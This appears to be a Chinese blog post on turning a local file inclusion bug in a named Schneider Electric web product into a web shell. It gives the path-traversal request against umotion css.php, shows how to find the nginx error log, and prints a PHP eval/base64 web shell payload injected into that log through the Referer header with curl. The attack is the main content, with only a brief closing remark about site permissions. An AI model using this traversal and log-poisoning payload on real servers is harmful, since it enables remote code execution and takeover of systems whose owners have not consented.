0前言
在WEB渗透测试中尤其是PHP,经常会挖到LFI漏洞,想要GETSHELL,但无奈没有文件上传的途径,这里给一个思路,抛砖引玉。
近日施耐德电气爆出的漏洞,首先得到了一个本地包含,在这里作为靶目标使用。
1.本地获得利用思路
umotion/themes/schneider/include/css.php?css=../../../../../../../etc/nginx&theme=ivory&version=110281.1 得到nginx配置
通过文件包含,枚举得到nginx的配置文件。
/etc/nginx/nginx.conf
配置文件中获得了nginx错误日志的路径,且关闭了访问日志。
error_log /var/log/nginx_error.log;
access_log off;1.2 利用思路整理
那么我们可以利用错误日志来构造合法的php代码,从而利用包含漏洞。
下面可以很直观想到的几个问题:
何时才会向nginx错误日志写入错误内容。
如何控制我们写入的内容。
如果遇到转义写入如何绕过。
目前知道的情况:
目标系统为nginx + FastCGI + php架构。
2.了解何时会向nginx错误日志写入内容。
通过观察日志可以很容易发现,如果请求为404/403等异常错误码,或者FastCGI返回出错信息,均会记录到nginx错误日志中,
2017/06/15 17:27:37 [error] 23229#0: *29454 open() "/web/html/favicon.ico" failed (2: No such file or directory), client:3.控制我们写入的内容
可以很容易发现,我们的请求PATH会被写入到错误日志中(请求路径不存在)。且携带我们的IP信息,以及HTTP头部的referrer。那么我们就可以利用这两点来构造。
4.绕过转义
这时候写入
<?php eval(base64_decode($__REQUEST[fob]));?>我们构造
host/xx/?<?php eval(base64_decode($__REQUEST[fob]));?>如果通过webkit内核浏览器访问,webkit会自动转移,直接通过curl发送。
这里使用referrer来注入代码到错误日志中。还好nginx端没有进行任何转义,如果遇到转义则需要见机行事,构造可用payload。
最后成功写入向错误日志中注入php代码。
5.总结
其实没什么技术含量,只是经常会遇到这种情况,包括各种日志,apache,nginx等。这里只提供一个思路。设置站点权限的时候,这些点可以关注下,包括读取日志得到敏感信息(后台,管理员信息等)。
本文永久地址[利用nginx日志结合本地包含漏洞GetShell],转载请注明出处。
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。